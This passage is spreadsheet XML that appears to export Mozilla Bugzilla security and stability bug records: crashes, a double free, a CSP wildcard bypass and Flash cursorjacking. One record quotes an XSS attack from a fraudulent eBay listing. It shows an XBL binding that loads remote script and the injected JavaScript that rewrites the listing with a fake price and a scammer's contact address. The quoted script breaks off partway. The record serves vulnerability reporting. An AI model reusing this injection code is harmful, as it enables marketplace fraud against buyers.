      <c r="Q342" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R342" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S342" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T342" t="n">
        <v>1</v>
      </c>
      <c r="U342" t="n">
        <v>0</v>
      </c>
      <c r="V342" t="n">
        <v>6</v>
      </c>
      <c r="W342" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-d4e65ff0-6962-415d-8c20-5d85c0170922.
=============================================================
This is topcrash #14 in the Android nightly 20170921100140.</t>
        </is>
      </c>
      <c r="X342" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="343">
      <c r="A343" t="n">
        <v>911845</v>
      </c>
      <c r="B343" t="inlineStr">
        <is>
          <t>2013-09-02 15:52:47 -0700</t>
        </is>
      </c>
      <c r="C343" t="inlineStr">
        <is>
          <t>Beta node checking, found bugs</t>
        </is>
      </c>
      <c r="D343" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:09 -0700</t>
        </is>
      </c>
      <c r="E343" t="n">
        <v>1</v>
      </c>
      <c r="F343" t="n">
        <v>1</v>
      </c>
      <c r="G343" t="n">
        <v>3</v>
      </c>
      <c r="H343" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I343" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J343" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K343" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L343" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M343" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N343" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O343" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P343" t="inlineStr">
        <is>
          <t>[qa-][adv-main27+]</t>
        </is>
      </c>
      <c r="Q343" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R343" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S343" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T343" t="n">
        <v>1</v>
      </c>
      <c r="U343" t="n">
        <v>0</v>
      </c>
      <c r="V343" t="n">
        <v>17</v>
      </c>
      <c r="W343" t="inlineStr">
        <is>
          <t>Created attachment 798626
range-make-infinite.patch
I extended --ion-check-range-analysis to include checking for Beta nodes. This turned up some cases where range analysis wasn't setting the max_exponent_ field properly.
I have not yet done any analysis to determine whether the bugs found are actually security-relevant, but since the bugs are in range analysis code, and they're present in various branches, I'm filing it as a protected bug to be on the safe side.</t>
        </is>
      </c>
      <c r="X343" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="344">
      <c r="A344" t="n">
        <v>1277854</v>
      </c>
      <c r="B344" t="inlineStr">
        <is>
          <t>2016-06-03 07:03:35 -0700</t>
        </is>
      </c>
      <c r="C344" t="inlineStr">
        <is>
          <t>Favicons load really slow in home panels</t>
        </is>
      </c>
      <c r="D344" t="inlineStr">
        <is>
          <t>2020-12-21 10:32:11 -0800</t>
        </is>
      </c>
      <c r="E344" t="n">
        <v>1</v>
      </c>
      <c r="F344" t="n">
        <v>1</v>
      </c>
      <c r="G344" t="n">
        <v>6</v>
      </c>
      <c r="H344" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I344" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J344" t="inlineStr">
        <is>
          <t>Favicon Handling</t>
        </is>
      </c>
      <c r="K344" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L344" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M344" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N344" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O344" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P344" t="inlineStr"/>
      <c r="Q344" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R344" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S344" t="inlineStr">
        <is>
          <t>Firefox 49</t>
        </is>
      </c>
      <c r="T344" t="n">
        <v>1</v>
      </c>
      <c r="U344" t="n">
        <v>0</v>
      </c>
      <c r="V344" t="n">
        <v>11</v>
      </c>
      <c r="W344" t="inlineStr">
        <is>
          <t>Scrolling through the home panels in Nightly the favicons load really slowly, one at a time. It's almost 1 sec / icon. This seems to be a new regression.</t>
        </is>
      </c>
      <c r="X344" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="345">
      <c r="A345" t="n">
        <v>483444</v>
      </c>
      <c r="B345" t="inlineStr">
        <is>
          <t>2009-03-14 14:07:15 -0700</t>
        </is>
      </c>
      <c r="C345" t="inlineStr">
        <is>
          <t>XSLT stylesheet compiler crashes</t>
        </is>
      </c>
      <c r="D345" t="inlineStr">
        <is>
          <t>2009-05-20 15:42:51 -0700</t>
        </is>
      </c>
      <c r="E345" t="n">
        <v>1</v>
      </c>
      <c r="F345" t="n">
        <v>1</v>
      </c>
      <c r="G345" t="n">
        <v>3</v>
      </c>
      <c r="H345" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I345" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J345" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K345" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L345" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M345" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N345" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O345" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P345" t="inlineStr">
        <is>
          <t>[sg:critical?] double free</t>
        </is>
      </c>
      <c r="Q345" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R345" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S345" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T345" t="n">
        <v>1</v>
      </c>
      <c r="U345" t="n">
        <v>0</v>
      </c>
      <c r="V345" t="n">
        <v>22</v>
      </c>
      <c r="W345" t="inlineStr">
        <is>
          <t>I don't have external URL for testcase yet, but any firefox 3.0 browser crashes on some specific testcase:
xslt/MSFT_Conformance_Tests/AttributeSets/xslt_attributeset_ImportSameName.html
#0  0xb7f1b7f2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0xb7ef9460 in raise () from /lib/i686/cmov/libpthread.so.0
#2  0xb6f0b57e in nsProfileLock::FatalSignalHandler (signo=11) at nsProfileLock.cpp:212
#3  &lt;signal handler called&gt;
#4  0x00000011 in ?? ()
#5  0xb41b9e40 in txStylesheet::addAttributeSet (this=0x8a1ac60, aAttributeSetItem=0x8ab7dd0) at ../../../../dist/include/xpcom/nsAutoPtr.h:71
#6  0xb41bbee7 in txStylesheet::doneCompiling (this=0x8a1ac60)
    at mozilla/content/xslt/src/xslt/txStylesheet.cpp:330
#7  0xb41c4e9b in txStylesheetCompiler::maybeDoneCompiling (this=0x8abf640)
    at mozilla/content/xslt/src/xslt/txStylesheetCompiler.cpp:552
#8  0xb41d32f5 in TX_CompileStylesheet (aNode=0x8cf8ea0, aProcessor=0x8ae4a00, aCallerPrincipal=0x8d36d28, aStylesheet=0x8ae4a1c)
    at mozilla/content/xslt/src/xslt/txMozillaStylesheetCompiler.cpp:809
#9  0xb41db505 in txMozillaXSLTProcessor::ImportStylesheet (this=0x8ae4a00, aStyle=0x8cf8f38)
    at mozilla/content/xslt/src/xslt/txMozillaXSLTProcessor.cpp:618
#10 0xb6f8db5f in NS_InvokeByIndex_P ()
   from obj-i386-nolibxul-buildmicrob2/dist/bin/libxpcom_core.so
#11 0xb6c30449 in XPCWrappedNative::CallMethod (ccx=@0xbff34308, mode=XPCWrappedNative::CALL_METHOD)
    at mozilla/js/src/xpconnect/src/xpcwrappednative.cpp:2424
#12 0xb6c395ba in XPC_WN_CallMethod (cx=0x89023e0, obj=0x87b5280, argc=1, argv=0x895b510, vp=0xbff34434)
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
    at mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp:1587
#13 0xb6e4a7eb in js_Invoke (cx=0x89023e0, argc=1, vp=0x895b508, flags=2)
    at mozilla/js/src/jsinterp.cpp:1312
#14 0xb6e3d6f1 in js_Interpret (cx=0x89023e0)
    at mozilla/js/src/jsinterp.cpp:5020
#15 0xb6e4a153 in js_Execute (cx=0x89023e0, chain=0x8a12640, script=0x8bd5a18, down=0x0, flags=0, result=0x0)
    at mozilla/js/src/jsinterp.cpp:1561
#16 0xb6e0a1da in JS_EvaluateUCScriptForPrincipals (cx=0x89023e0, obj=0x8a12640, principals=0x8a5ccec, chars=0x8a8e768, length=44, 
    filename=0x8a88198 "http://milosz-pc.research.nokia.com/testpages/browser/core//xslt//jsunit/app/jsUnitTestManager.js", lineno=395, rval=0x0)
    at mozilla/js/src/jsapi.cpp:5239
#17 0xb4222de6 in nsJSContext::EvaluateString (this=0x89023b0, aScript=@0xbff349cc, aScopeObject=0x8a12640, aPrincipal=0x8a5cce8, 
    aURL=0x8a88198 "http://milosz-pc.research.nokia.com/testpages/browser/core//xslt//jsunit/app/jsUnitTestManager.js", aLineNo=395, aVersion=0, 
    aRetValue=0x0, aIsUndefined=0xbff349e0)
    at mozilla/dom/src/base/nsJSEnvironment.cpp:1596
#18 0xb4230999 in nsGlobalWindow::RunTimeout (this=0x8a262f8, aTimeout=0x8bbc768)
    at mozilla/dom/src/base/nsGlobalWindow.cpp:7736
#19 0xb4230acd in nsGlobalWindow::TimerCallback (aTimer=0x8b75460, aClosure=0x8bbc768)
    at mozilla/dom/src/base/nsGlobalWindow.cpp:8087
#20 0xb6f81581 in nsTimerImpl::Fire (this=0x8b75460)
    at mozilla/xpcom/threads/nsTimerImpl.cpp:428
#21 0xb6f81648 in nsTimerEvent::Run (this=0x8b6bca0)
    at mozilla/xpcom/threads/nsTimerImpl.cpp:520
#22 0xb6f7e457 in nsThread::ProcessNextEvent (this=0x85aca70, mayWait=0, result=0xbff34ae8)
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
    at mozilla/xpcom/threads/nsThread.cpp:510
#23 0xb6f40647 in NS_ProcessPendingEvents_P (thread=0x85aca70, timeout=20) at nsThreadUtils.cpp:180
#24 0xb46bcff6 in nsBaseAppShell::NativeEventCallback (this=0x88d1120)
    at mozilla/widget/src/xpwidgets/nsBaseAppShell.cpp:121
#25 0xb46a4e7c in nsAppShell::EventProcessorCallback (source=0x88d1170, condition=G_IO_IN, data=0x88d1120)
    at mozilla/widget/src/gtk2/nsAppShell.cpp:69
#26 0xb777af2d in ?? () from /usr/lib/libglib-2.0.so.0</t>
        </is>
      </c>
      <c r="X345" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="346">
      <c r="A346" t="n">
        <v>1437942</v>
      </c>
      <c r="B346" t="inlineStr">
        <is>
          <t>2018-02-13 09:26:41 -0800</t>
        </is>
      </c>
      <c r="C346" t="inlineStr">
        <is>
          <t>Remove search engines from language packs</t>
        </is>
      </c>
      <c r="D346" t="inlineStr">
        <is>
          <t>2019-05-15 06:56:06 -0700</t>
        </is>
      </c>
      <c r="E346" t="n">
        <v>1</v>
      </c>
      <c r="F346" t="n">
        <v>1</v>
      </c>
      <c r="G346" t="n">
        <v>2</v>
      </c>
      <c r="H346" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I346" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J346" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K346" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N346" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O346" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P346" t="inlineStr"/>
      <c r="Q346" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R346" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S346" t="inlineStr">
        <is>
          <t>Firefox 62</t>
        </is>
      </c>
      <c r="T346" t="n">
        <v>1</v>
      </c>
      <c r="U346" t="n">
        <v>0</v>
      </c>
      <c r="V346" t="n">
        <v>74</v>
      </c>
      <c r="W346" t="inlineStr">
        <is>
          <t>The end goal for the search JSON work was to move to a place where we shipped all searcn engines in Firefox and did the right thing regardless of your language (Region focus).
It's time to finally do that.
We should package all engines in the base product. Language packs should be just language.
This will mean moving to a model where the entire list.json file is packaged in Firefox and parsed at runtime (including regionOverrides).
This was my original vision, but we just weren't there yet with multilocale Firefox. We're getting there now, so it's time to change.</t>
        </is>
      </c>
      <c r="X346" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="347">
      <c r="A347" t="n">
        <v>572232</v>
      </c>
      <c r="B347" t="inlineStr">
        <is>
          <t>2010-06-15 15:56:34 -0700</t>
        </is>
      </c>
      <c r="C347" t="inlineStr">
        <is>
          <t>js_InvokeConstructor with clampReturn==JS_TRUE and user-controlled ctor is a gc hazard</t>
        </is>
      </c>
      <c r="D347" t="inlineStr">
        <is>
          <t>2013-03-20 08:36:28 -0700</t>
        </is>
      </c>
      <c r="E347" t="n">
        <v>1</v>
      </c>
      <c r="F347" t="n">
        <v>1</v>
      </c>
      <c r="G347" t="n">
        <v>3</v>
      </c>
      <c r="H347" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I347" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J347" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K347" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N347" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O347" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P347" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:investigating]</t>
        </is>
      </c>
      <c r="Q347" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R347" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S347" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T347" t="n">
        <v>1</v>
      </c>
      <c r="U347" t="n">
        <v>0</v>
      </c>
      <c r="V347" t="n">
        <v>16</v>
      </c>
      <c r="W347" t="inlineStr">
        <is>
          <t>See bug 567577 comment 9 and bug 567577 comment 10.
I *think* we either need to add a tvr for the noted default-return object in js_InvokeConstructor or figure out whether __noSuchMethod__ functionality can ever be invoked in a constructing situation.  The latter is probably hard, and the former is probably easy, which suggests probably the former is what we should do.
This also shows up in JS_New on trunk (but conservative stack scanning saves us) and in fun_applyConstructor (Narcissus-only, so I think we don't care), but neither of these cases needs a change.</t>
        </is>
      </c>
      <c r="X347" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="348">
      <c r="A348" t="n">
        <v>1125013</v>
      </c>
      <c r="B348" t="inlineStr">
        <is>
          <t>2015-01-22 22:03:46 -0800</t>
        </is>
      </c>
      <c r="C348" t="inlineStr">
        <is>
          <t>Mozilla Firefox for Mac OS X : Cursor can be totally invisible using flash object and div</t>
        </is>
      </c>
      <c r="D348" t="inlineStr">
        <is>
          <t>2024-05-30 08:39:37 -0700</t>
        </is>
      </c>
      <c r="E348" t="n">
        <v>1</v>
      </c>
      <c r="F348" t="n">
        <v>1</v>
      </c>
      <c r="G348" t="n">
        <v>3</v>
      </c>
      <c r="H348" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I348" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J348" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K348" t="inlineStr">
        <is>
          <t>35 Branch</t>
        </is>
      </c>
      <c r="L348" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M348" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N348" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O348" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P348" t="inlineStr">
        <is>
          <t>[adv-main37+] RESOLVED FIXED by bug 1121811 on trunk</t>
        </is>
      </c>
      <c r="Q348" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R348" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S348" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T348" t="n">
        <v>1</v>
      </c>
      <c r="U348" t="n">
        <v>0</v>
      </c>
      <c r="V348" t="n">
        <v>35</v>
      </c>
      <c r="W348" t="inlineStr">
        <is>
          <t>Created attachment 8553549
TESTCASE1 new cursorjacking vuln.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:35.0) Gecko/20100101 Firefox/35.0
Build ID: 20150108202552
Steps to reproduce:
When you go on a flash object (with the cursor) that defined the cursor like invisible and a &lt;div&gt; transparent object (transparent obligatory) covers this flash object, 
the cursor is now totally invisible. 
This flaw can be in used in combination with an image of the cursor manipulated through JavaScript, leading to clickjacking during interactions with HTML content subsequently.
I have coded a PoC with the same interaction/severity as the PoC for bug995603 (the difference between this two bugs is :
in bug995603 (RESOLVED/FIXED) , the cursor is on the flash object and a some &lt;div&gt; will cover a part of this flash object , and the bug appear when you move the cursor to the &lt;div&gt;.
in this new bug (WORKS ON STABLE/BETA AND OTHERS VERSION OF FIREFOX) , the &lt;div&gt; will directly cover the totality of the flash object .
steps:
1 : Go to the flash object with the cursor (don't click on the flash object)
2 : Wait 2 s 
3 : The cursor is totally invisible on all element/ button (on webpage or firefox elements) / addon window or what you want
i will upload a video that demonstrates this vulnerability
Actual results:
This flaw can be in used in combination with an image of the cursor manipulated through JavaScript, leading to clickjacking during interactions with HTML content subsequently.
Expected results:
The cursor is totally invisible on all element/ button (on webpage or firefox elements) / addon window or what you want</t>
        </is>
      </c>
      <c r="X348" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="349">
      <c r="A349" t="n">
        <v>1388015</v>
      </c>
      <c r="B349" t="inlineStr">
        <is>
          <t>2017-08-07 03:26:10 -0700</t>
        </is>
      </c>
      <c r="C349" t="inlineStr">
        <is>
          <t>Partial Content Security Policy bypass if host-part contains wildcard</t>
        </is>
      </c>
      <c r="D349" t="inlineStr">
        <is>
          <t>2020-06-05 00:22:24 -0700</t>
        </is>
      </c>
      <c r="E349" t="n">
        <v>1</v>
      </c>
      <c r="F349" t="n">
        <v>1</v>
      </c>
      <c r="G349" t="n">
        <v>3</v>
      </c>
      <c r="H349" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I349" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J349" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K349" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L349" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M349" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N349" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O349" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P349" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main69+][adv-esr68.1+]</t>
        </is>
      </c>
      <c r="Q349" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R349" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S349" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T349" t="n">
        <v>1</v>
      </c>
      <c r="U349" t="n">
        <v>0</v>
      </c>
      <c r="V349" t="n">
        <v>14</v>
      </c>
      <c r="W349" t="inlineStr">
        <is>
          <t>Created attachment 8894461
CSP wildcard PoC.html
A Content-Security-Policy: img-src https://*:4433 should only allow port 4433, but Firefox allows a URL with all ports.
Reproducible in Firefox Stable 54 and Nightly 57.0a1. Not reproducible in Edge and Chrome.
This is the same issue as https://bugs.chromium.org/p/chromium/issues/detail?id=682673 in Chromium.</t>
        </is>
      </c>
      <c r="X349" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="350">
      <c r="A350" t="n">
        <v>481558</v>
      </c>
      <c r="B350" t="inlineStr">
        <is>
          <t>2009-03-04 18:58:17 -0800</t>
        </is>
      </c>
      <c r="C350" t="inlineStr">
        <is>
          <t>Loading an untrusted stylesheet should not allow that stylesheet to inject script using XBL</t>
        </is>
      </c>
      <c r="D350" t="inlineStr">
        <is>
          <t>2009-04-23 16:49:52 -0700</t>
        </is>
      </c>
      <c r="E350" t="n">
        <v>1</v>
      </c>
      <c r="F350" t="n">
        <v>1</v>
      </c>
      <c r="G350" t="n">
        <v>3</v>
      </c>
      <c r="H350" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I350" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J350" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K350" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N350" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O350" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P350" t="inlineStr">
        <is>
          <t>[sg:want] requires fix for 416942/483170</t>
        </is>
      </c>
      <c r="Q350" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R350" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S350" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T350" t="n">
        <v>1</v>
      </c>
      <c r="U350" t="n">
        <v>1</v>
      </c>
      <c r="V350" t="n">
        <v>66</v>
      </c>
      <c r="W350" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6
Demonstrated by a fraudulent ebay listing which caused in-page details to be rewritten using a script hosted outside the ebay.co.uk domain. Link at http://tinyurl.com/c7ow2l
This is a XSS attack which exploits XBL javascript bindings. The ebay listing contained this...
&lt;LINK media=all href="http://petereales.web.officelive.com/Documents/index.htm" type=text/css rel=stylesheet&gt;
http://petereales.web.officelive.com/Documents/index.htm contains this code...
body { width: expression(ebClientServerCallDynamicScriptObject('http://petereales.web.officelive.com/Documents/index.html')); -moz-binding: url(http://petereales.web.officelive.com/Documents/index.xml#index); }
http://petereales.web.officelive.com/Documents/index.xml#index contains this code...
&lt;?xml version="1.0" encoding="utf-8"?&gt; 
&lt;bindings xmlns="http://www.mozilla.org/xbl" xmlns:xbl="http://www.mozilla.org/xbl"&gt;
&lt;binding id="index"&gt;
&lt;implementation&gt;
&lt;constructor&gt;ebClientServerCallDynamicScriptObject('http://petereales.web.officelive.com/Documents/index.html');&lt;/constructor&gt; 
&lt;/implementation&gt;
&lt;/binding&gt;
&lt;/bindings&gt;
http://petereales.web.officelive.com/Documents/index.html contains this code...
if (typeof loadt == 'undefined') {
    var mail = 'fr33train@gmail.com';
    var price = '&amp;#163;3,200.00';
    var iit = '1282528736197';
    var MA = new Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec");
    var et = new Date(svrGMT + 3596);
    var year = et.getYear();
    if (year &lt; 1000)
        year += 1900;
    year = new String(year);
    var cH = et.getHours();
    var cM = et.getMinutes();
    var cS = et.getSeconds();
    function lf() {
        var l = document.links;
        for (var i = 0; i &lt; l.length; i++) {
            if (l[i].href.match(/\d{12}/i) &amp;&amp; !l[i].href.match(/ebayphotohosting/i)) {
                l[i].href = l[i].href.replace(/\d{12}/g, iit);
            }
        }
        var f = document.forms;
        for (var i = 0; i &lt; f.length; i++) {
            if (f[i].item) {
                f[i].item.value = iit;
            }
        }
        try {
            document.getElementById("FastVIDetailsBottom").innerHTML = "";
            itemId = iit;
        } catch(err) {}
        try {
            tabb = document.getElementsByTagName('table');
            for (i = tabb.length - 1; i &gt;= 0; i--) {
                if (tabb[i].innerHTML.indexOf('Questions from other members') != -1 &amp;&amp; i &gt; 1) {
                    tabb[i - 1].style.display = 'none';
                    break;
                }
            }
        } catch(err) {}
    }
    document.getElementById("FastVIPBIBO").getElementsByTagName('table')[1].insertRow(1).insertCell(0).innerHTML = '&lt;img src="http://pics.ebaystatic.com/aw/pics/s.gif" width="5" height="1"&gt;&lt;span class="sectiontitle"&gt;&lt;nobr&gt;&lt;b&gt;Note: This listing is restricted to pre-approved bidder/buyer list.&lt;/b&gt;&lt;/nobr&gt;&lt;/span&gt;&lt;br&gt;&lt;span class="standard"&gt;Email the seller at ' + mail + ' to buy this item.&lt;/span&gt;';
    var t1 = document.getElementById("FastVIPDetails").getElementsByTagName('table')[0];
    var tr1 = t1.getElementsByTagName('tr');
    for (var i = 0; i &lt; tr1.length; i++) {
        if (tr1[i].innerHTML.match(/&lt;hr/i)) {
            break;
        }
    }
    c = t1.insertRow(i - 1).insertCell(0);
    c.colSpan = 4;
    c.innerHTML = '&lt;img width="1" height="20" src="http://pics.ebaystatic.com/aw/pics/s.gif"/&gt;';
    r = t1.insertRow(i);
    r.vAlign = "middle";
    c = r.insertCell(0);
    c.width = '25%';
    c.align = "left";
    c.innerHTML = '&lt;span class="titlePurchase"&gt;&lt;img align="middle" style="vertical-align: text-bottom;" alt="Buy It Now" src="http://pics.ebaystatic.com/aw/pics/bin_15x54.gif"/&gt; price:&lt;/span&gt;';
    c = r.insertCell(1);
    c.noWrap = 'yes';
    c.innerHTML = '&lt;span class="sectiontitle"&gt;&lt;b&gt;' + price + '&lt;/b&gt;&lt;/span&gt;';
    c = r.insertCell(2);
    c.width = '85%';
    c.innerHTML = '&lt;button style="padding-right: 0px;" class="VIPriBtn" type="submit"&gt;&lt;span class="btn"&gt;&lt;span class="btn"&gt;Buy It Now &gt;&lt;/span&gt;&lt;/span&gt;&lt;/button&gt;';
    c = t1.insertRow(i + 1).insertCell(0);
    c.colSpan = 4;
    tr1 = t1.getElementsByTagName('tr');
    var nr = new RegExp("(\\d{1,3},\\d{1,3}|\\d{1,3})\\.\\d{2}");
    for (var i = tr1.length - 1; i &gt;= 0; i--) {
        td1 = tr1[i].getElementsByTagName('td');
        for (var j = 0; j &lt; td1.length; j++) {
            var ttd = td1[j].innerHTML;
            if (ttd.match(/End time/i)) {
                td1[j + 1].innerHTML = '&lt;font color="#ff0000" class="sectiontitle"&gt;&lt;nobr&gt;59 mins 56 secs&lt;/nobr&gt;&lt;/font&gt; &lt;nobr&gt;(' + MA[et.getMonth()] + "-" + et.getDate() + "-" + year.substr(2, 2) + " " + ((cH &lt; 10) ? "0": "") + cH + ":" + ((cM &lt; 10) ? "0": "") + cM + ":" + ((cS &lt; 10) ? "0": "") + cS + ' PDT)&lt;/nobr&gt;';
                break;
            }
            if (ttd.match(nr) &amp;&amp; !tr1[i].innerHTML.match(/Buy It Now/)) {
                td1[j].innerHTML = ttd.replace(nr, "0.99");
                break;
            }
            if (ttd.match(/(costs:)/i)) {
                td1[j + 1].innerHTML = '&lt;b&gt;FREE&lt;/b&gt;&lt;br&gt;Standard Flat Rate Shipping Service';
                break;
            }
            if (ttd.match(/to:/i)) {
                td1[j + 1].innerHTML = 'United Kingdom, United States, Canada';
                break;
            }
            if (ttd.match(/Item location/i)) {
                td1[j + 1].innerHTML = 'FREE SHIPPING';
                break;
            }
            if (ttd.match(/History/i)) {
                td1[j + 1].innerHTML = td1[j + 1].innerHTML.replace(/(Bidders list|\d+\s[a-z]+)/, "0 Bids", "im");
                break;
            }
        }
        if (tr1[i].innerHTML.match(/(Quantity|Cost per item|High bidder)/im)) {
            t1.deleteRow(tr1[i].rowIndex);
        }
    }
    var d = document.getElementsByTagName('td');
    for (var i = 0; i &lt; d.length; i++) {
